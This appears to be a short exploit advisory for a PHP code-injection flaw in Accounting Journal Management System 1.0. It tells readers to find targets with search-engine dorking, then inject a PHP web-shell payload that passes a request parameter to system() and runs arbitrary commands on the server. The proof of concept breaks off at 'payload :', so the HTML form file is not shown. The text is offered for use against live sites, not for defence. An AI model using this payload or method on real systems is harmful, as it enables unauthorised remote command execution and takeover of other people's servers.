============================================================================================================================================= | # Title : Accounting Journal Management System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload injects code of your choice into an HTML page. You give it a name and save it in the root directory of the script. and executes it remotely. [+] Line 11 : 'Content[welcome]' = Replace "welcome" with any label you want. [+] Line 11 : Replace the payload as you wish = "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> [+] save payload as poc.html [+] Set your target url [+] payload :